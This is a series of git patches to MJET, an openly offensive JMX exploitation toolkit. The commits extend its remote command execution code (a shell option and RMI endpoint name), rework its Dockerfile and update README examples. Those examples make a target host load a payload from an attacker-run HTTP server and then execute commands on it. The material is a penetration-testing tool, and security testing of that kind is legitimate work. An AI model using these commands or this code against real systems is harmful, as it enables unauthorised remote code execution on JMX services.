From d0a6c0670a56d0d9a56a6bf6aa5631c1b9bf7a01 Mon Sep 17 00:00:00 2001 From: Moritz Date: Tue, 1 Jun 2021 10:55:21 +0200 Subject: [PATCH 01/10] Bug Fix - Shell Mode works now --- mjet.py | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/mjet.py b/mjet.py index 2cdfb34..d3b4a98 100644 --- a/mjet.py +++ b/mjet.py @@ -65,7 +65,7 @@ def jxmrmi_url(args): from javax.management.remote import JMXServiceURL jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + - args.targetHost + ":" + args.targetPort + "/jmxrmi") + args.targetHost + ":" + args.targetPort + "/" + args.rmiObjectName) return jmx_url @@ -291,11 +291,11 @@ def changePassword(password, newpass, bean_server): def commandMode(args): bean_server = connectToJMX(args) - executeCommand(args.password, args.cmd, bean_server) + executeCommand(args.password, args.cmd, bean_server, args.shell) print "[+] Done" -def executeCommand(password, cmd, bean_server): +def executeCommand(password, cmd, bean_server, shell): # Payload execution # Load the Payload MLet and invoke a method on it mlet_bean = bean_server.getObjectInstance( @@ -303,14 +303,16 @@ def executeCommand(password, cmd, bean_server): print "[+] Loaded " + str(mlet_bean.getClassName()) print "[+] Executing command: " + cmd - inv_array1 = jarray.zeros(2, Object) + inv_array1 = jarray.zeros(3, Object) inv_array1[0] = password inv_array1[1] = cmd + inv_array1[2] = shell - inv_array2 = jarray.zeros(2, String) + inv_array2 = jarray.zeros(3, String) inv_array2[0] = String.canonicalName inv_array2[1] = String.canonicalName - + inv_array2[2] = String.canonicalName + resource = bean_server.invoke( mlet_bean.getObjectName(), "runCMD", inv_array1, inv_array2) @@ -378,7 +380,7 @@ def startShell(password, bean_server): if cmd == 'exit_shell': in_command_loop = False else: - executeCommand(password, cmd, bean_server) + executeCommand(password, cmd, bean_server, args.shell) ### /SHELL MODE ### @@ -576,6 +578,8 @@ def arg_cve_2016_3427_mode(args): parser.add_argument('--jmxpassword', help='remote JMX password') parser.add_argument('--jmxmp', action='store_true', help='Use JMX Message Protocol') +parser.add_argument('--shell', help='run with custom shell') +parser.add_argument('--rmiObjectName', help='RMI name of the JMX endpoint', default='jmxrmi') parser.add_argument('--localhost_bypass', default=None, dest="localhost_bypass_port", From c2419d31e57d8ebcaf0c3c1de1b6bf5d2eb626e5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch?= Date: Tue, 1 Jun 2021 11:02:08 +0200 Subject: [PATCH 02/10] Update README.md Fixing small bugs with mode/password settings --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e397ba1..2272300 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,7 @@ information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) a MJET implements a CLI interface (using [argparse](https://docs.python.org/3/library/argparse.html)): ``` -jython mjet.py targetHost targetPort password MODE (modeOptions) +jython mjet.py targetHost targetPort MODE password (modeOptions) ``` Where @@ -97,7 +97,7 @@ h0ng10@rocksteady ~/w/mjet> Installation with JMX credentials (also needs a weak configuration of the server): ``` -h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD +h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD mJET - MOGWAI LABS JMX Exploitation Toolkit ======================================= [+] Starting webserver at port 8000 From 9188dea8a0180bf866dcf1119ee10f60e5a2a215 Mon Sep 17 00:00:00 2001 From: h0ng10 Date: Wed, 2 Jun 2021 00:50:21 +0200 Subject: [PATCH 03/10] Updating contributions --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 2272300..75196f2 100644 --- a/README.md +++ b/README.md @@ -424,6 +424,8 @@ Feel free to contribute. * **Arnim Rupp** - *Authentication support* * **Sebastian Kindler** - *Deserialization support* * **Karsten Zeides** - *JMX Message Protocol support, localhost bypass* [zeides](https://github.com/zeides) +* **g60ocR** - *Docker file* [g60ocR](https://github.com/g60ocR) +* **Morn98** - *Shell and RMI selection* [Morn98](https://github.com/Morn98)) See also the list of [contributors](https://github.com/mogwailabs/sjet/graphs/contributors) who participated in this project. From 34954677dce273f377a15df1b373104e6ee55891 Mon Sep 17 00:00:00 2001 From: h0ng10 Date: Wed, 2 Jun 2021 00:52:01 +0200 Subject: [PATCH 04/10] Improved Dockerfile --- Dockerfile | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/Dockerfile b/Dockerfile index 4a227df..fdde5b1 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,10 @@ FROM ubuntu:latest ENV TZ=Europe/Stockholm RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone -RUN apt-get update && apt-get install -y jython wget git && rm -rf /var/lib/apt/lists/* +RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/* COPY . /app -RUN wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar +RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \ + && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar EXPOSE 8000 WORKDIR /app -ENTRYPOINT ["jython", "mjet.py"] +ENTRYPOINT ["tail", "-f", "/dev/null"] From fabcbe2ce9926f0499eeb77c5aa1529eba22522b Mon Sep 17 00:00:00 2001 From: Timo Mueller Date: Wed, 30 Jun 2021 22:47:15 +0200 Subject: [PATCH 05/10] Dockerfile entryppoint improvement --- Dockerfile | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index fdde5b1..233cdb3 100644 --- a/Dockerfile +++ b/Dockerfile @@ -7,4 +7,5 @@ RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-stand && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar EXPOSE 8000 WORKDIR /app -ENTRYPOINT ["tail", "-f", "/dev/null"] +ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"] +CMD ["-h"] From 30befb70eb5a1caf41bc3d58b005e448cc60d783 Mon Sep 17 00:00:00 2001 From: Timo Mueller Date: Wed, 30 Jun 2021 23:13:33 +0200 Subject: [PATCH 06/10] Reduced docker image size --- Dockerfile | 3 +-- README.md | 13 +++++++++++++ 2 files changed, 14 insertions(+), 2 deletions(-) diff --git a/Dockerfile b/Dockerfile index 233cdb3..cc39073 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,7 +1,6 @@ -FROM ubuntu:latest +FROM openjdk:13-alpine ENV TZ=Europe/Stockholm RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone -RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/* COPY . /app RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \ && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar diff --git a/README.md b/README.md index 75196f2..f694030 100644 --- a/README.md +++ b/README.md @@ -412,6 +412,19 @@ $ Reference: https://www.optiv.com/blog/exploiting-jmx-rmi +### Docker + +Build and run the docker image + +```bash +# Build +docker build -t mjet . +# Run Help +docker run mjet +# Exploit example +docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000 +``` + ## Contributing Feel free to contribute. From 28d664d42958f8c153dd0ca13658646e4df62490 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Timo=20M=C3=BCller?= Date: Wed, 30 Jun 2021 23:29:46 +0200 Subject: [PATCH 07/10] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index f694030..490ca4c 100644 --- a/README.md +++ b/README.md @@ -425,6 +425,8 @@ docker run mjet docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000 ``` +By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it! + ## Contributing Feel free to contribute. From a4f4672ebbad07b9fc07127ee30951ffea2efc00 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Timo=20M=C3=BCller?= Date: Wed, 30 Jun 2021 23:30:43 +0200 Subject: [PATCH 08/10] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 490ca4c..df24c53 100644 --- a/README.md +++ b/README.md @@ -423,6 +423,8 @@ docker build -t mjet . docker run mjet # Exploit example docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000 +# Run Interactive into shell +docker run --entrypoint /bin/sh -it mjet ``` By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it! From 11d3265bd0526687b1e3a7e1709f22c14e3c5b16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Timo=20M=C3=BCller?= Date: Fri, 27 Aug 2021 10:39:31 +0200 Subject: [PATCH 09/10] Downgrade of the openjdk version Alpine-13 was failing during the ysoserial payload generation --- Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index cc39073..e5c63f2 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM openjdk:13-alpine +FROM openjdk:8-alpine ENV TZ=Europe/Stockholm RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone COPY . /app From c85ba1ede23ae723604d26fe621ec576abca9785 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch?= Date: Mon, 13 Mar 2023 10:09:29 +0100 Subject: [PATCH 10/10] Update README.md Adding "closed" message --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index df24c53..7786474 100644 --- a/README.md +++ b/README.md @@ -4,10 +4,13 @@ MOGWAI LABS JMX Exploitation Toolkit MJET is a fork of [sjet](https://github.com/siberas/sjet/), which was developed by siberas but is no longer actively maintained. MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase. - MJET allows an easy exploitation of insecure configured JMX services. Additional background information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf). +## !!! Important: This project is no longer maintained +This repository is **no longer activly maintained**. We recommend using [qtcs beanshooter](https://github.com/qtc-de/beanshooter) instead. + + ## Prerequisites * [Jython 2.7](https://www.jython.org/)